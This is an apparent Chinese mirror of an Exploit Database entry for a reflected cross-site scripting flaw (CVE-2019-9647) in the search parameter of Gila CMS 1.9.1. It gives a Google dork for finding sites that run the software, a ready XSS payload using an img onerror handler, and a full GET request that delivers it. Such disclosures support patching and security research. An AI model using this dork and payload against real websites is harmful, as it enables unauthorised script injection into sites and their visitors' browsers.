Gila CMS 1.9.1 – Cross-Site Scripting

• Exploit Database
• 36 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-03-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46557/

• # Exploit Title: Gila CMS (search) Cross Site Scripting
  # Google Dork: intext:"Powered By Gila CMS"
  # Date: 11.03.2019
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor Homepage: https://gilacms.com
  # Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
  # Demo Site: https://gilacms.com/demo/
  # Version: 1.9.1
  # Tested on: Kali Linux
  # CVE: CVE-2019-9647
  
  # Vulnerable Parameter: search
  
  # Payload: <--`<img/src=` onerror=confirm``> --!>
  
  # GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>